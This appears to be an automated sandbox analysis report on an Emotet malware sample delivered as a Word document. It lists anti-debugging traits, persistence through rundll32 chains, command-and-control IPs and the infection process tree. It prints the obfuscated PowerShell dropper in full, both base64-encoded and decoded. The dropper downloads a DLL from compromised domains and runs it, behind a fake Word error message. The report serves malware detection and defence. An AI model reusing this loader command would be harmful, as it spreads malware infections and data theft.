Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100031D0 RunDLL,LoadLibraryA,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWind 7_2_100031D0
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10015D3F EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 7_2_10015D3F
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10015D3F EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 7_2_10015D3F
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001B6AB2 mov eax, dword ptr fs:[00000030h] 7_2_001B6AB2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001D76B2 mov eax, dword ptr fs:[00000030h] 9_2_001D76B2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001F6AB2 mov eax, dword ptr fs:[00000030h] 10_2_001F6AB2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00306AB2 mov eax, dword ptr fs:[00000030h] 11_2_00306AB2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004B76B2 mov eax, dword ptr fs:[00000030h] 12_2_004B76B2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_001C6AB2 mov eax, dword ptr fs:[00000030h] 13_2_001C6AB2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001D76B2 mov eax, dword ptr fs:[00000030h] 14_2_001D76B2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_001A6AB2 mov eax, dword ptr fs:[00000030h] 15_2_001A6AB2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 17_2_001E76B2 mov eax, dword ptr fs:[00000030h] 17_2_001E76B2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_00206AB2 mov eax, dword ptr fs:[00000030h] 18_2_00206AB2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_002076B2 mov eax, dword ptr fs:[00000030h] 20_2_002076B2
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10005930 SetLastError,GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError, 7_2_10005930
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000BCEA SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_1000BCEA

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 202.187.222.40 80
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 184.66.18.83 80
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 167.71.148.58 187
Encrypted powershell cmdline option found
Source: unknown Process created: Base64 decoded $ioxKy2 = [tYPE]("{2}{0}{3}{1}"-f'sTEm.iO.diRecT','y','Sy','Or') ; sEt-IteM vaRiabLe:16VJ ([tYPe]("{6}{7}{3}{5}{0}{2}{4}{1}" -F'V','r','IcEPoiN','NeT.S','TmaNaGE','eR','sYS','tem.') );$Kt3sbog=('B'+('m'+'v'+'kk9r'));$Mj5npw_=$Z9ls4z6 + [char](64) + $G35w524;$Yd085rx=('Ux'+('ee'+'_')+'wl'); ( gEt-itEM ('vaRI'+'AblE'+':'+'IoXKY2') ).VAlue::"C`RE`AT`e`dIREctOrY"($HOME + ((('IE'+'c')+'O'+('_'+'wgq')+'v'+('7'+'IEcC031')+('6emIE'+'c')) -crEplAcE ('IE'+'c'),[cHAR]92));$Ml29469=('R'+('6j'+'kuve')); ( VARiAbLe 16vj -vALUEon )::"sEC`Urityp`RoTo`coL" = ('Tl'+('s1'+'2'));$Nimh_ux=('He'+'z'+('fu'+'29'));$Mem0uwr = ('Ly'+('et'+'a6')+'ud');$Fj_inxi=(('Vv'+'3')+('jeg'+'8'));$Gyzf4g8=(('Q5'+'7qw')+'k'+'z');$C0w7ro6=$HOME+(('{0}O_wgqv'+'7'+'{0'+'}'+'C'+'0316em{0}') -f [ChAr]92)+$Mem0uwr+(('.d'+'l')+'l');$Gb3lyk8=(('Mx'+'1g')+('g'+'om'));$Rp56zra=NEW`-Ob`JeCt NeT.WEbCLiEnt;$Cj5kwnm=(((('http:qq)'+'(s2'+')(qq'+')'))+'('+(('s2'+')(zen'+'i'))+('thc'+'ampu'+'s.c')+(('o'+'mqq)(s2'+')'+'(lq'+'q)'))+(('(s'))+'2'+((')'+'(yQ'+'qq)('))+(('s'+'2)'))+('(@htt'+'p'+':q'+'q'+')(s2)')+(('(q'))+(('q'+')(s2)'))+(('(h'+'b'))+('privile'+'g')+('e'+'d.')+(('co'+'mqq)(s2)'+'(cg'+'i-bin'+'q'))+(('q)('+'s2)'))+(('(kcg'+'gFqq'))+((')'+'(s2)'))+('(@htt'+'p'+':'+'qq)')+'('+(('s2)('+'q'))+(('q)('+'s2)('+'l'+'oc'))+'al'+'af'+('fo'+'rdab'+'l'+'er')+('oof'+'e')+'r.'+'co'+(('mq'+'q)(s2'+')'))+'('+('r'+'al')+'ph'+'s-'+'r'+('e'+'ce')+(('ipt-f2uh'+'fqq'+')('))+'s2'+((')'+'(q'))+'T'+('T'+'5DC')+'qq'+')'+(('(s'+'2'
Source: C:\Windows\System32\cmd.exe Process created: Base64 decoded $ioxKy2 = [tYPE]("{2}{0}{3}{1}"-f'sTEm.iO.diRecT','y','Sy','Or') ; sEt-IteM vaRiabLe:16VJ ([tYPe]("{6}{7}{3}{5}{0}{2}{4}{1}" -F'V','r','IcEPoiN','NeT.S','TmaNaGE','eR','sYS','tem.') );$Kt3sbog=('B'+('m'+'v'+'kk9r'));$Mj5npw_=$Z9ls4z6 + [char](64) + $G35w524;$Yd085rx=('Ux'+('ee'+'_')+'wl'); ( gEt-itEM ('vaRI'+'AblE'+':'+'IoXKY2') ).VAlue::"C`RE`AT`e`dIREctOrY"($HOME + ((('IE'+'c')+'O'+('_'+'wgq')+'v'+('7'+'IEcC031')+('6emIE'+'c')) -crEplAcE ('IE'+'c'),[cHAR]92));$Ml29469=('R'+('6j'+'kuve')); ( VARiAbLe 16vj -vALUEon )::"sEC`Urityp`RoTo`coL" = ('Tl'+('s1'+'2'));$Nimh_ux=('He'+'z'+('fu'+'29'));$Mem0uwr = ('Ly'+('et'+'a6')+'ud');$Fj_inxi=(('Vv'+'3')+('jeg'+'8'));$Gyzf4g8=(('Q5'+'7qw')+'k'+'z');$C0w7ro6=$HOME+(('{0}O_wgqv'+'7'+'{0'+'}'+'C'+'0316em{0}') -f [ChAr]92)+$Mem0uwr+(('.d'+'l')+'l');$Gb3lyk8=(('Mx'+'1g')+('g'+'om'));$Rp56zra=NEW`-Ob`JeCt NeT.WEbCLiEnt;$Cj5kwnm=(((('http:qq)'+'(s2'+')(qq'+')'))+'('+(('s2'+')(zen'+'i'))+('thc'+'ampu'+'s.c')+(('o'+'mqq)(s2'+')'+'(lq'+'q)'))+(('(s'))+'2'+((')'+'(yQ'+'qq)('))+(('s'+'2)'))+('(@htt'+'p'+':q'+'q'+')(s2)')+(('(q'))+(('q'+')(s2)'))+(('(h'+'b'))+('privile'+'g')+('e'+'d.')+(('co'+'mqq)(s2)'+'(cg'+'i-bin'+'q'))+(('q)('+'s2)'))+(('(kcg'+'gFqq'))+((')'+'(s2)'))+('(@htt'+'p'+':'+'qq)')+'('+(('s2)('+'q'))+(('q)('+'s2)('+'l'+'oc'))+'al'+'af'+('fo'+'rdab'+'l'+'er')+('oof'+'e')+'r.'+'co'+(('mq'+'q)(s2'+')'))+'('+('r'+'al')+'ph'+'s-'+'r'+('e'+'ce')+(('ipt-f2uh'+'fqq'+')('))+'s2'+((')'+'(q'))+'T'+('T'+'5DC')+'qq'+')'+(('(s'+'2'
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAaQBvAHgASwB5ADIAIAA9ACAAWwB0AFkAUABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIALQBmACcAcwBUAEUAbQAuAGkATwAuAGQAaQBSAGUAYwBUACcALAAnAHkAJwAsACcAUwB5ACcALAAnAE8AcgAnACkAIAA7ACAAcwBFAHQALQBJAHQAZQBNACAAIAB2AGEAUgBpAGEAYgBMAGUAOgAxADYAVgBKACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADYAfQB7ADcAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACcAVgAnACwAJwByACcALAAnAEkAYwBFAFAAbwBpAE4AJwAsACcATgBlAFQALgBTACcALAAnAFQAbQBhAE4AYQBHAEUAJwAsACcAZQBSACcALAAnAHMAWQBTACcALAAnAHQAZQBtAC4AJwApACAAKQA7ACQASwB0ADMAcwBiAG8AZwA9ACgAJwBCACcAKwAoACcAbQAnACsAJwB2ACcAKwAnAGsAawA5AHIAJwApACkAOwAkAE0AagA1AG4AcAB3AF8APQAkAFoAOQBsAHMANAB6ADYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEcAMwA1AHcANQAyADQAOwAkAFkAZAAwADgANQByAHgAPQAoACcAVQB4ACcAKwAoACcAZQBlACcAKwAnAF8AJwApACsAJwB3AGwAJwApADsAIAAgACgAIAAgAGcARQB0AC0AaQB0AEUATQAgACgAJwB2AGEAUgBJACcAKwAnAEEAYgBsAEUAJwArACcAOgAnACsAJwBJAG8AWABLAFkAMgAnACkAIAApAC4AVgBBAGwAdQBlADoAOgAiAEMAYABSAEUAYABBAFQAYABlAGAAZABJAFIARQBjAHQATwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEkARQAnACsAJwBjACcAKQArACcATwAnACsAKAAnAF8AJwArACcAdwBnAHEAJwApACsAJwB2ACcAKwAoACcANwAnACsAJwBJAEUAYwBDADAAMwAxACcAKQArACgAJwA2AGUAbQBJAEUAJwArACcAYwAnACkAKQAgAC0AYwByAEUAcABsAEEAYwBFACAAIAAoACcASQBFACcAKwAnAGMAJwApACwAWwBjAEgAQQBSAF0AOQAyACkAKQA7ACQATQBsADIAOQA0ADYAOQA9ACgAJwBSACcAKwAoACcANgBqACcAKwAnAGsAdQB2AGUAJwApACkAOwAgACAAKAAgACAAVgBBAFIAaQBBAGIATABlACAAMQA2AHYAagAgACAALQB2AEEATABVAEUAbwBuACAAKQA6ADoAIgBzAEUAQwBgAFUAcgBpAHQAeQBwAGAAUgBvAFQAbwBgAGMAbwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABOAGkAbQBoAF8AdQB4AD0AKAAnAEgAZQAnACsAJwB6ACcAKwAoACcAZgB1ACcAKwAnADIAOQAnACkAKQA7ACQATQBlAG0AMAB1AHcAcgAgAD0AIAAoACcATAB5ACcAKwAoACcAZQB0ACcAKwAnAGEANgAnACkAKwAnAHUAZAAnACkAOwAkAEYAagBfAGkAbgB4AGkAPQAoACgAJwBWAHYAJwArACcAMwAnACkAKwAoACcAagBlAGcAJwArACcAOAAnACkAKQA7ACQARwB5AHoAZgA0AGcAOAA9ACgAKAAnAFEANQAnACsAJwA3AHEAdwAnACkAKwAnAGsAJwArACcAegAnACkAOwAkAEMAMAB3ADcAcgBvADYAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBPAF8AdwBnAHEAdgAnACsAJwA3ACcAKwAnAHsAMAAnACsAJwB9ACcAKwAnAEMAJwArACcAMAAzADEANgBlAG0AewAwAH0AJwApACAALQBmACAAWwBDAGgAQQByAF0AOQAyACkAKwAkAE0AZQBtADAAdQB3AHIAKwAoACgAJwAuAGQAJwArACcAbAAnACkAKwAnAGwAJwApADsAJABHAGIAMwBsAHkAawA4AD0AKAAoACcATQB4ACcAKwAnADEAZwAnACkAKwAoACcAZwAnACsAJwBvAG0AJwApACkAOwAkAFIAcAA1ADYAegByAGEAPQBOAEUAVwBgAC0ATwBiAGAASgBlAEMAdAAgAE4AZQBUAC4AVwBFAGIAQwBMAGkARQBuAHQAOwAkAEMAagA1AGsAdwBuAG0APQAoACgAKAAoACcAaAB0AHQAcAA6AHEAcQApACcAKwAnACgAcwAyACcAKwAnACkAKABxAHEAJwArACcAKQAnACkAKQArACcAKAAnACsAKAAoACcAcwAyACcAKwAnACkAKAB6AGUAbgAnACsAJwBpACcAKQApACsAKAAnAHQAaABjACcAKwAnAGEAbQBwAHUAJwArACcAcwAuAGMAJwApACsAKAAoACcAbwAnACsAJwBtAHEAcQApACgAcwAyACcAKwAnACkAJwArACcAKABsAHEAJwArACcAcQApACcAKQApACsAKAAoACcAKABzACcAKQApACsAJwAyACcAKwAoACgAJwApACcAKwAnACgAeQBRACcAKwAnAHEAcQApACgAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACgAJwAoAEAAaAB0AHQAJwArACcAcAAnACsAJwA6AHEAJwArACcAcQAnACsAJwApACgAcwAyACkAJwApACsAKAAoACcAKABxACcAKQApACsAK
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\O_wgqv7\C0316em\Lyeta6ud.dll #1
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\O_wgqv7\C0316em\Lyeta6ud.dll #1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yozs\bhycn.bcx',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hxqt\iieutea.ehw',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yjfs\gmxhcr.dhy',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hszr\zft.hxn',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vnjt\awo.cnn',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dkpu\lbsvbo.gas',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Opqf\zrop.pvh',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Blgp\gmlbr.kph',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mnrm\xmfd.ucf',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wnoc\mhxywle.szw',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xqby\jcrucsb.dql',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Etxd\pkvco.wzp',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eiig\mmslr.ajj',RunDLL
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD 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
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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

Language, Device and Operating System Detection:

Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free, 7_2_10016021
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW,_GetPrimaryLen, 7_2_10018026
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s, 7_2_10018090
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW, 7_2_100178A6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 7_2_100150C4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 7_2_10016A2B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _LcidFromHexString,GetLocaleInfoW, 7_2_10017A6A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 7_2_1000DADD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 7_2_1000DB1A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 7_2_10017B1A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_memmove,_memmove,_memmove,_free,_free,_free,_free,_free,_free,_free,_free,_free, 7_2_1000A33F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _GetPrimaryLen,EnumSystemLocalesW, 7_2_10017B5A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _GetPrimaryLen,EnumSystemLocalesW, 7_2_10017BD7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free, 7_2_10016429
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage, 7_2_10017C5A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson, 7_2_1000DD4A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage, 7_2_10017E4F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP, 7_2_10017F79
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 7_2_10010D9C
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Emotet
Behavior Graph ID: 344355, Sample: DAT.doc, Startdate: 26/01/2021, Architecture: WINDOWS, Score: 100 (graph image not reproduced).
Process chain shown in the graph: WINWORD.EXE drops C:\Users\user\Desktop\~$DAT.doc; cmd.exe starts msg.exe and powershell.exe; powershell.exe contacts zenithcampus.com (35.200.206.198, port 80) and localaffordableroofer.com (107.180.12.39, port 80), drops C:\Users\user\O_wgqv7\C0316em\Lyeta6ud.dll (PE32) and starts rundll32.exe, which spawns a chain of seven further rundll32.exe processes, each flagged for hiding that the sample was downloaded from the Internet (zone.identifier).

Contacted Public IPs

IP  Domain  Country  ASN  ASN Name  Malicious
167.71.148.58  unknown  United States  14061  DIGITALOCEAN-ASNUS  true
35.200.206.198  unknown  United States  15169  GOOGLEUS  true
